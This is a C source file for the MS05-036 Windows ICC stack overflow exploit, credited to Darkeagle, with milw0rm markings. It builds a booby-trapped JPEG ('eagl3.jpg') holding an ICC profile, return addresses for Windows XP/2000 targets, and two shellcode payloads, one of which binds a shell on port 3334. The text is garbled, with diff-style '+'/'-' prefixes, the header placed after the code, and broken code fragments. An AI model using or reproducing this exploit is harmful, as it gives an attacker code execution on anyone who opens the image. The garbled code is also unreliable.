-"\xC1\xE3\xC2\x5F\xC2\xDB\xC3\x58\xC3\xD4\xC4\x51\xC4\xCE\xC5\x4B" -"\xC5\xC8\xC6\x46\xC6\xC3\xC7\x41\xC7\xBF\xC8\x3D\xC8\xBC\xC9\x3A" -"\xC9\xB9\xCA\x38\xCA\xB7\xCB\x36\xCB\xB6\xCC\x35\xCC\xB5\xCD\x35" -"\xCD\xB5\xCE\x36\xCE\xB6\xCF\x37\xCF\xB8\xD0\x39\xD0\xBA\xD1\x3C" 
-"\xD1\xBE\xD2\x3F\xD2\xC1\xD3\x44\xD3\xC6\xD4\x49\xD4\xCB\xD5\x4E" -"\xD5\xD1\xD6\x55\xD6\xD8\xD7\x5C\xD7\xE0\xD8\x64\xD8\xE8\xD9\x6C" -"\xD9\xF1\xDA\x76\xDA\xFB\xDB\x80\xDC\x05\xDC\x8A\xDD\x10\xDD\x96" -"\xDE\x1C\xDE\xA2\xDF\x29\xDF\xAF\xE0\x36\xE0\xBD\xE1\x44\xE1\xCC" -"\xE2\x53\xE2\xDB\xE3\x63\xE3\xEB\xE4\x73\xE4\xFC\xE5\x84\xE6\x0D" -"\xE6\x96\xE7\x1F\xE7\xA9\xE8\x32\xE8\xBC\xE9\x46\xE9\xD0\xEA\x5B" -"\xEA\xE5\xEB\x70\xEB\xFB\xEC\x86\xED\x11\xED\x9C\xEE\x28\xEE\xB4" -"\xEF\x40\xEF\xCC\xF0\x58\xF0\xE5\xF1\x72\xF1\xFF\xF2\x8C\xF3\x19" -"\xF3\xA7\xF4\x34\xF4\xC2\xF5\x50\xF5\xDE\xF6\x6D\xF6\xFB\xF7\x8A" -"\xF8\x19\xF8\xA8\xF9\x38\xF9\xC7\xFA\x57\xFA\xE7\xFB\x77\xFC\x07" -"\xFC\x98\xFD\x29\xFD\xBA\xFE\x4B\xFE\xDC\xFF\x6D\xFF\xFF\xFF\xFE" -"\x00\x1F\x4C\x45\x41\x44\x20\x54\x65\x63\x68\x6E\x6F\x6C\x6F\x67" -"\x69\x65\x73\x20\x49\x6E\x63\x2E\x20\x56\x31\x2E\x30\x31\x00\xFF" -"\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x03\x03" -"\x02\x03\x04\x07\x04\x04\x03\x03\x04\x08\x06\x06\x05\x07\x0A\x09" -"\x0A\x0A\x0A\x09\x0A\x09\x0B\x0C\x10\x0E\x0B\x0C\x0F\x0C\x09\x0A" -"\x0E\x13\x0E\x0F\x11\x11\x12\x12\x12\x0B\x0D\x14\x15\x14\x12\x15" -"\x10\x12\x12\x11\x01\x03\x03\x03\x04\x03\x04\x08\x04\x04\x08\x11" -"\x0B\x0A\x0B\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" -"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" -"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" -"\x11\x11\x11\x11\x11\xFF\xC4\x01\xA2\x00\x00\x01\x05\x01\x01\x01" -"\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05" -"\x06\x07\x08\x09\x0A\x0B\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01" -"\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08" -"\x09\x0A\x0B\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04" -"\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06" -"\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1" -"\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A" 
-"\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
-"\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65"
-"\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85"
-"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3"
-"\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA"
-"\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8"
-"\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4"
-"\xF5\xF6\xF7\xF8\xF9\xFA\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07"
-"\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
-"\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1"
-"\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1"
-"\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39"
-"\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59"
-"\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79"
-"\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97"
-"\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5"
-"\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
-"\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA"
-"\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC0\x00\x11\x08\x01\x20"
-"\x01\xE0\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01\xFF\xDA\x00\x0C"
-"\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xFD\xFC\xA0\x02\x80\x0A"
-"\x00\x28\x00\xA0\x02\x80\x0A\x00\x28\x00\xA0\x02\x80\x0A\x00\x28";
-
-struct {
-char *os;
-long jmpADD;
-long writeable_add;
-}
-
-targets[] = {
-{ "Windows XP without SP eng/rus", 0x77E9FC79, 0x00064000 },
-{ "Windows XP SP1 eng/rus ", 0x77E9AE59, 0x00064000 },
-{ "Windows 2000 SP0 ", 0x77f8948b, 0x00064000 },
-{ "Crash Explorer ", 0x41424344, 0x00064000 },
-{ "Dummy (crash all) ", 0x0, 0x00064000 },
-}, v;
-
-unsigned char shellcode[] =
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
-"\xb0\x8c\x35\x83\xeb\xfc\xe2\xf4\xa2\xda\x67\x78\xb6\x49\x73\xca" -"\xa1\xd0\x07\x59\x7a\x94\x07\x70\x62\x3b\xf0\x30\x26\xb1\x63\xbe" -"\x11\xa8\x07\x6a\x7e\xb1\x67\x7c\xd5\x84\x07\x34\xb0\x81\x4c\xac" -"\xf2\x34\x4c\x41\x59\x71\x46\x38\x5f\x72\x67\xc1\x65\xe4\xa8\x1d" -"\x2b\x55\x07\x6a\x7a\xb1\x67\x53\xd5\xbc\xc7\xbe\x01\xac\x8d\xde" -"\x5d\x9c\x07\xbc\x32\x94\x90\x54\x9d\x81\x57\x51\xd5\xf3\xbc\xbe" -"\x1e\xbc\x07\x45\x42\x1d\x07\x75\x56\xee\xe4\xbb\x10\xbe\x60\x65" -"\xa1\x66\xea\x66\x38\xd8\xbf\x07\x36\xc7\xff\x07\x01\xe4\x73\xe5" -"\x36\x7b\x61\xc9\x65\xe0\x73\xe3\x01\x39\x69\x53\xdf\x5d\x84\x37" -"\x0b\xda\x8e\xca\x8e\xd8\x55\x3c\xab\x1d\xdb\xca\x88\xe3\xdf\x66" -"\x0d\xe3\xcf\x66\x1d\xe3\x73\xe5\x38\xd8\x81\x33\x38\xe3\x05\xd4" -"\xcb\xd8\x28\x2f\x2e\x77\xdb\xca\x88\xda\x9c\x64\x0b\x4f\x5c\x5d" -"\xfa\x1d\xa2\xdc\x09\x4f\x5a\x66\x0b\x4f\x5c\x5d\xbb\xf9\x0a\x7c" -"\x09\x4f\x5a\x65\x0a\xe4\xd9\xca\x8e\x23\xe4\xd2\x27\x76\xf5\x62" -"\xa1\x66\xd9\xca\x8e\xd6\xe6\x51\x38\xd8\xef\x58\xd7\x55\xe6\x65" -"\x07\x99\x40\xbc\xb9\xda\xc8\xbc\xbc\x81\x4c\xc6\xf4\x4e\xce\x18" -"\xa0\xf2\xa0\xa6\xd3\xca\xb4\x9e\xf5\x1b\xe4\x47\xa0\x03\x9a\xca" -"\x2b\xf4\x73\xe3\x05\xe7\xde\x64\x0f\xe1\xe6\x34\x0f\xe1\xd9\x64" -"\xa1\x60\xe4\x98\x87\xb5\x42\x66\xa1\x66\xe6\xca\xa1\x87\x73\xe5" -"\xd5\xe7\x70\xb6\x9a\xd4\x73\xe3\x0c\x4f\x5c\x5d\xae\x3a\x88\x6a" -"\x0d\x4f\x5a\xca\x8e\xb0\x8c\x35"; - - -char shellcod2e[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf1\x80\x34\x0b\xee\xe2\xfa\xeb\x05" -"\xe8\xed\xff\xff\xff" -/* 220 bytes shellcode, xor with 0xee */ -"\x07\x4a\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65" -"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\xaa\xee\xee\xee" -"\x0c\x17\x86\x81\x80\xee\xee\x86\x9b\x9c\x82\x83\xba\x11\xf8\x65" -"\x06\x06\xc0\xee\xee\xee\x6d\x02\xce\x65\x32\x84\xce\xbd\x11\xb8" -"\xea\x29\xea\xed\xb2\x8f\xc0\x8b\x29\xaa\xed\xea\x96\x8b\xee\xee" -"\xdd\x2e\xbe\xbe\xbd\xb9\xbe\x11\xb8\xfe\x65\x32\xbe\xbd\x11\xb8" 
-"\xe6\x11\xb8\xe2\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0\x96\xed\x1b\xb8"
-"\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b\xdd\x35\xe1\x50"
-"\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05\x1f\xd5\xf1\x9b"
-"\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65\xb0\xf2\xed\x33"
-"\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xb9\x11\x11\x11\x60\xa0"
-"\xe0\x02\x2f\x97\x0b\x56\x76\x10\x64\xe0\x90\x36\x0c\x9d\xd8\xf4"
-"\xc1\x9e\x86\x9a\x9a\x9e\xd4\xc1\xc1\xdf\xdc\xd9\xc0\xde\xc0\xde"
-"\xc0\xdf\xc1\x9a\x8b\x9d\x9a\xc0\x8b\x96\x8b\xee";
-
-
-unsigned char b[4];
-
-
-DWORD t2b(DWORD pBuf)
-{
-
-DWORD ret;
-
-*((char*)&ret + 0) = *((char*)&pBuf +3);
-*((char*)&ret + 1) = *((char*)&pBuf +2);
-*((char*)&ret + 2) = *((char*)&pBuf +1);
-*((char*)&ret + 3) = *((char*)&pBuf);
-
-return ret;
-
-}
-
-void get_bytes(long word)
-{
-b[0]=word&0xff;
-b[1]=(word>>8)& 0xff;
-b[2]=(word>>16)&0xff;
-b[3]=(word>>24)&0xff;
-}
-
-void err_exit(char *s)
-{
-printf("%s\n",s);
-exit(0);
-}
-
-
-
-void hexdump(char * pbuf,unsigned int size)
-{
-unsigned int i = 0;
-for (; i < size ; i++){
-printf("%.2X ", (unsigned char) pbuf[i]);
-if( (i+1) %16 == 0)
-putchar('\n');
-}
-
-return;
-}
-
-void buildfile()
-{
-int i=0;
-FILE *fd;
-
-if ((fd=fopen(FNAME,"wb"))==NULL) {
-err_exit("-> Failed to generate file...");
-}
-
-for(;i '%s' generated.\n",FNAME);
-printf("-> shellcode binds 3334 port.\n");
-
-}
-
-void dword_revert(char * p,unsigned int size)
-{
-DWORD * ptr = &p;
-int i = 0;
-char * q = p + size; //end
-
-for(; p <= q; p +=4)
-{
-*p ^= *(p+3);
-*(p+3) ^= *p;
-*p ^= *(p+3);
-
-*(p+1) ^= *(p+2);
-*(p+2) ^= *(p+1);
-*(p+1) ^= *(p+2);
-}
-
-
-return;
-}
-
-void list_target()
-{
-unsigned int i = 0 ;
-
-printf("\nTargets \t\t\n");
-while(targets[i].jmpADD != NULL){
-printf("#%d\t%s\n", i+1, targets[i].os);
-i++;
-}
-return;
-}
-
-
-
-int main(int argc, char *argv[])
-{
-int i=0, t=TARGET, size=0;
-int shal = 0;
-unsigned int sc_size = strlen(shellcode);
-unsigned int tag_size = stack_land_offset -
tag_content_offset + 1 + sc_size ;
-long fRetaddr = 0x00;
-
-if (argc < 2) {
-printf("\n\n");
-
-printf("* Windows ICC stack overflow exploit (MS05-36)\n");
-printf("* Code Execution Exploit\n");
-printf("* (c) Darkeagle [ private code ]\n");
-printf("* usage -> ms05-036 (jmp/call esp)\n");
-list_target() ;
-exit(0);
-}
-
-t=atoi(argv[1]);
-
-if ( argc == 3 )
-sscanf(argv[2], "0x%x", &fRetaddr);
-
-memset(buff + tag_content_offset, 0x90,tag_size);
-
-*(DWORD*)(buff + no_access_violate2) = t2b(targets[t-1].writeable_add);
-*(DWORD*)(buff + no_access_violate) = t2b(0x4);
-if ( fRetaddr == 0x00 )
-{
-*(DWORD*)(buff + ret_addr_offset) = t2b(targets[t-1].jmpADD);
-} else {
-*(DWORD*)(buff + ret_addr_offset) = t2b(fRetaddr);
-}
-strncpy(buff + stack_land_offset, shellcode, sc_size);
-dword_revert(buff + stack_land_offset, sc_size);
-
-tag_size = (tag_size >> 2 << 2) + 4;
-printf("current size: 0x%.8X\n",tag_size);
-*(DWORD*)(buff + content_size_offset) = t2b(tag_size);
-
-buildfile();
-
-return 0;
-
-}
-
-// milw0rm.com [2006-02-17]
+/*
+\ MS05-036 ICC Stack Overflow Exploit
+/ by Darkeagle
+\
+/ GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand
+\
+/
+\ special tnx to snooq for his PoC.
+/
+\
+/ xploit was tested on WinXP SP1 RUS with explorer.exe
+\
+/ 02.08.05
+\
+/ http://eagle.blacksecurity.org
+\
+*/
+
+#include
+#include
+#include
+
+#define TARGET 1
+#define NOP 0x90
+#define FNAME "eagl3.jpg"
+#define BSIZE sizeof(buff)-1
+#define EIP_OFFSET 0x3A0
+#define SC_OFFSET 0x246
+#define NOP_OFFSET 0x218
+#define NOP_SIZE 0x112
+
+#define tag_content_offset 0x23E // file buffer offset craft stuff
+#define content_size_offset 0xE2 // tag content buffer size
+#define no_access_violate 0x32E // avoid access violate
+#define no_access_violate2 0x32E+12 // avoid access violate
+#define stack_land_offset ret_addr_offset+16 // reture address offset
+#define ret_addr_offset no_access_violate+8 // reture address offset
+
+/*
+* Silly JPEG stuffed with ICC profile.........
+*/
+
+char buff[]=
+"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60"
+"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46"
+"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10"
+"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE"
+"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53"
+"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01"
+"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00"
+"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00"
+"\x00\x6C\x77\x74\x70\x74\x00\x00\x01\xF0\x00\x00\x00\x14\x62\x6B"
+"\x70\x74\x00\x00\x02\x04\x00\x00\x00\x14\x72\x58\x59\x5A\x00\x00"
+"\x02\x18\x00\x00\x00\xFC\x67\x58\x59\x5A\x00\x00\x02\x2C\x00\x00"
+"\x00\x14\x62\x58\x59\x5A\x00\x00\x02\x40\x00\x00\x00\x14\x64\x6D"
+"\x6E\x64\x00\x00\x02\x54\x00\x00\x00\x70\x64\x6D\x64\x64\x00\x00"
+"\x02\xC4\x00\x00\x00\x88\x76\x75\x65\x64\x00\x00\x03\x4C\x00\x00" +"\x00\x86\x76\x69\x65\x77\x00\x00\x03\xD4\x00\x00\x00\x24\x6C\x75" +"\x6D\x69\x00\x00\x03\xF8\x00\x00\x00\x14\x6D\x65\x61\x73\x00\x00" +"\x04\x0C\x00\x00\x00\x24\x74\x65\x63\x68\x00\x00\x04\x30\x00\x00" +"\x00\x0C\x72\x54\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x67\x54" +"\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x62\x54\x52\x43\x00\x00" +"\x04\x3C\x00\x00\x08\x0C\x74\x65\x78\x74\x00\x00\x00\x00\x43\x6F" +"\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x31\x39\x39\x38" +"\x20\x48\x65\x77\x6C\x65\x74\x74\x2D\x50\x61\x63\x6B\x61\x72\x64" +"\x20\x43\x6F\x6D\x70\x61\x6E\x79\x00\x00\x64\x65\x73\x63\x00\x00" +"\x00\x00\x00\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31" +"\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31\x39\x36\x36" +"\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00" +"\xF3\x51\x00\x01\x00\x00\x00\x01\x16\xCC\x58\x59\x5A\x20\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x59" +"\x5A\x20\x00\x00\x00\x00\x00\x00\x6F\xA2\x00\x00\x38\xF5\x00\x00" +"\x03\x90\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00\x62\x99\x00\x00" +"\xB7\x85\x00\x00\x18\xDA\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00" +"\x24\xA0\x00\x00\x0F\x84\x00\x00\xB6\xCF\x64\x65\x73\x63\x00\x00" +"\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A\x2F" +"\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A" +"\x2F\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x65\x73\x63\x00\x00" +"\x00\x00\x00\x00\x00\x2E\x49\x45\x43\x20\x36\x31\x39\x36\x36\x2D" +"\x32\x2E\x31\x20\x44\x65\x66\x61\x75\x6C\x74\x20\x52\x47\x42\x20" +"\x63\x6F\x6C\x6F\x75\x72\x20\x73\x70\x61\x63\x65\x20\x2D\x20\x73" +"\x52\x47\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x04\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x65\x66" +"\x61\x75\x6C\x74\x20\x52\x47\x42\x20\x63\x6F\x6C\x6F\x75\x72\x20" +"\x73\x70\x61\x63\x65\x20\x2D\x20\x73\x52\x47\x42\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x64\x65\x73\x63\x00\x00\x00\x00\x00\x00\x00\x2C\x52\x65" +"\x66\x65\x72\x65\x6E\x63\x65\x20\x56\x69\x65\x77\x69\x6E\x67\x20" +"\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E\x20\x69\x6E\x20\x49\x45\x43" +"\x36\x31\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x2C\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x20\x56" +"\x69\x65\x77\x69\x6E\x67\x20\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E" +"\x20\x69\x6E\x20\x49\x45\x43\x36\x31\x39\x36\x36\x2D\x32\x2E\x31" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x65\x77\x00\x00" +"\x00\x00\x00\x13\xA4\xFE\x00\x14\x5F\x2E\x00\x10\xCF\x14\x00\x03" +"\xED\xCC\x00\x04\x13\x0B\x00\x03\x5C\x9E\x00\x00\x00\x01\x58\x59" +"\x5A\x20\x00\x00\x00\x00\x00\x4C\x09\x56\x00\x50\x00\x00\x00\x57" +"\x1F\xE7\x6D\x65\x61\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x02\x8F\x00\x00\x00\x02\x73\x69\x67\x20\x00\x00\x00\x00\x43\x52" +"\x54\x20\x63\x75\x72\x76\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00" +"\x00\x05\x00\x0A\x00\x0F\x00\x14\x00\x19\x00\x1E\x00\x23\x00\x28" +"\x00\x2D\x00\x32\x00\x37\x00\x3B\x00\x40\x00\x45\x00\x4A\x00\x4F" +"\x00\x54\x00\x59\x00\x5E\x00\x63\x00\x68\x00\x6D\x00\x72\x00\x77" +"\x00\x7C\x00\x81\x00\x86\x00\x8B\x00\x90\x00\x95\x00\x9A\x00\x9F" 
+"\x00\xA4\x00\xA9\x00\xAE\x00\xB2\x00\xB7\x00\xBC\x00\xC1\x00\xC6" +"\x00\xCB\x00\xD0\x00\xD5\x00\xDB\x00\xE0\x00\xE5\x00\xEB\x00\xF0" +"\x00\xF6\x00\xFB\x01\x01\x01\x07\x01\x0D\x01\x13\x01\x19\x01\x1F" +"\x01\x25\x01\x2B\x01\x32\x01\x38\x01\x3E\x01\x45\x01\x4C\x01\x52" +"\x01\x59\x01\x60\x01\x67\x01\x6E\x01\x75\x01\x7C\x01\x83\x01\x8B" +"\x01\x92\x01\x9A\x01\xA1\x01\xA9\x01\xB1\x01\xB9\x01\xC1\x01\xC9" +"\x01\xD1\x01\xD9\x01\xE1\x01\xE9\x01\xF2\x01\xFA\x02\x03\x02\x0C" +"\x02\x14\x02\x1D\x02\x26\x02\x2F\x02\x38\x02\x41\x02\x4B\x02\x54" +"\x02\x5D\x02\x67\x02\x71\x02\x7A\x02\x84\x02\x8E\x02\x98\x02\xA2" +"\x02\xAC\x02\xB6\x02\xC1\x02\xCB\x02\xD5\x02\xE0\x02\xEB\x02\xF5" +"\x03\x00\x03\x0B\x03\x16\x03\x21\x03\x2D\x03\x38\x03\x43\x03\x4F" +"\x03\x5A\x03\x66\x03\x72\x03\x7E\x03\x8A\x03\x96\x03\xA2\x03\xAE" +"\x03\xBA\x03\xC7\x03\xD3\x03\xE0\x03\xEC\x03\xF9\x04\x06\x04\x13" +"\x04\x20\x04\x2D\x04\x3B\x04\x48\x04\x55\x04\x63\x04\x71\x04\x7E" +"\x04\x8C\x04\x9A\x04\xA8\x04\xB6\x04\xC4\x04\xD3\x04\xE1\x04\xF0" +"\x04\xFE\x05\x0D\x05\x1C\x05\x2B\x05\x3A\x05\x49\x05\x58\x05\x67" +"\x05\x77\x05\x86\x05\x96\x05\xA6\x05\xB5\x05\xC5\x05\xD5\x05\xE5" +"\x05\xF6\x06\x06\x06\x16\x06\x27\x06\x37\x06\x48\x06\x59\x06\x6A" +"\x06\x7B\x06\x8C\x06\x9D\x06\xAF\x06\xC0\x06\xD1\x06\xE3\x06\xF5" +"\x07\x07\x07\x19\x07\x2B\x07\x3D\x07\x4F\x07\x61\x07\x74\x07\x86" +"\x07\x99\x07\xAC\x07\xBF\x07\xD2\x07\xE5\x07\xF8\x08\x0B\x08\x1F" +"\x08\x32\x08\x46\x08\x5A\x08\x6E\x08\x82\x08\x96\x08\xAA\x08\xBE" +"\x08\xD2\x08\xE7\x08\xFB\x09\x10\x09\x25\x09\x3A\x09\x4F\x09\x64" +"\x09\x79\x09\x8F\x09\xA4\x09\xBA\x09\xCF\x09\xE5\x09\xFB\x0A\x11" +"\x0A\x27\x0A\x3D\x0A\x54\x0A\x6A\x0A\x81\x0A\x98\x0A\xAE\x0A\xC5" +"\x0A\xDC\x0A\xF3\x0B\x0B\x0B\x22\x0B\x39\x0B\x51\x0B\x69\x0B\x80" +"\x0B\x98\x0B\xB0\x0B\xC8\x0B\xE1\x0B\xF9\x0C\x12\x0C\x2A\x0C\x43" +"\x0C\x5C\x0C\x75\x0C\x8E\x0C\xA7\x0C\xC0\x0C\xD9\x0C\xF3\x0D\x0D" +"\x0D\x26\x0D\x40\x0D\x5A\x0D\x74\x0D\x8E\x0D\xA9\x0D\xC3\x0D\xDE" 
+"\x0D\xF8\x0E\x13\x0E\x2E\x0E\x49\x0E\x64\x0E\x7F\x0E\x9B\x0E\xB6" +"\x0E\xD2\x0E\xEE\x0F\x09\x0F\x25\x0F\x41\x0F\x5E\x0F\x7A\x0F\x96" +"\x0F\xB3\x0F\xCF\x0F\xEC\x10\x09\x10\x26\x10\x43\x10\x61\x10\x7E" +"\x10\x9B\x10\xB9\x10\xD7\x10\xF5\x11\x13\x11\x31\x11\x4F\x11\x6D" +"\x11\x8C\x11\xAA\x11\xC9\x11\xE8\x12\x07\x12\x26\x12\x45\x12\x64" +"\x12\x84\x12\xA3\x12\xC3\x12\xE3\x13\x03\x13\x23\x13\x43\x13\x63" +"\x13\x83\x13\xA4\x13\xC5\x13\xE5\x14\x06\x14\x27\x14\x49\x14\x6A" +"\x14\x8B\x14\xAD\x14\xCE\x14\xF0\x15\x12\x15\x34\x15\x56\x15\x78" +"\x15\x9B\x15\xBD\x15\xE0\x16\x03\x16\x26\x16\x49\x16\x6C\x16\x8F" +"\x16\xB2\x16\xD6\x16\xFA\x17\x1D\x17\x41\x17\x65\x17\x89\x17\xAE" +"\x17\xD2\x17\xF7\x18\x1B\x18\x40\x18\x65\x18\x8A\x18\xAF\x18\xD5" +"\x18\xFA\x19\x20\x19\x45\x19\x6B\x19\x91\x19\xB7\x19\xDD\x1A\x04" +"\x1A\x2A\x1A\x51\x1A\x77\x1A\x9E\x1A\xC5\x1A\xEC\x1B\x14\x1B\x3B" +"\x1B\x63\x1B\x8A\x1B\xB2\x1B\xDA\x1C\x02\x1C\x2A\x1C\x52\x1C\x7B" +"\x1C\xA3\x1C\xCC\x1C\xF5\x1D\x1E\x1D\x47\x1D\x70\x1D\x99\x1D\xC3" +"\x1D\xEC\x1E\x16\x1E\x40\x1E\x6A\x1E\x94\x1E\xBE\x1E\xE9\x1F\x13" +"\x1F\x3E\x1F\x69\x1F\x94\x1F\xBF\x1F\xEA\x20\x15\x20\x41\x20\x6C" +"\x20\x98\x20\xC4\x20\xF0\x21\x1C\x21\x48\x21\x75\x21\xA1\x21\xCE" +"\x21\xFB\x22\x27\x22\x55\x22\x82\x22\xAF\x22\xDD\x23\x0A\x23\x38" +"\x23\x66\x23\x94\x23\xC2\x23\xF0\x24\x1F\x24\x4D\x24\x7C\x24\xAB" +"\x24\xDA\x25\x09\x25\x38\x25\x68\x25\x97\x25\xC7\x25\xF7\x26\x27" +"\x26\x57\x26\x87\x26\xB7\x26\xE8\x27\x18\x27\x49\x27\x7A\x27\xAB" +"\x27\xDC\x28\x0D\x28\x3F\x28\x71\x28\xA2\x28\xD4\x29\x06\x29\x38" +"\x29\x6B\x29\x9D\x29\xD0\x2A\x02\x2A\x35\x2A\x68\x2A\x9B\x2A\xCF" +"\x2B\x02\x2B\x36\x2B\x69\x2B\x9D\x2B\xD1\x2C\x05\x2C\x39\x2C\x6E" +"\x2C\xA2\x2C\xD7\x2D\x0C\x2D\x41\x2D\x76\x2D\xAB\x2D\xE1\x2E\x16" 